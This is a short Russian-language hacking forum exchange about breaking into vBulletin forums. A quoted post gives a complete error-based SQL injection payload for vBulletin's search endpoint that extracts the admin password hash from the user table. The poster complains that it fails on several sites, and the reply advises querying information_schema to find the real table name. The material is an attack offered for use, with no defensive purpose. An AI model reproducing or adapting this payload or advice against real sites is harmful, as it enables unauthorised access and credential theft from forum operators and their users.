
08.12.2015, 17:09
|
|
Guest
Сообщений: n/a
Провел на форуме: 300820
Репутация:
90
|
|
Сообщение от Sensoft
Sensoft said:
↑
В общем такой вопрос взламываю способом
Spoiler: Скрипт
securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
В ошибке должен выходить pass (без соли на это другой скрипт)
Но выходит такая годня почему ?

Даже если соль хочу вывести всё ровно такая хрень
и это не единственный сайт где такие траблы
vBulletin
так красным по белому же написано что таблицы user нет, information_schema рекомендую глянуть
|
|
|
|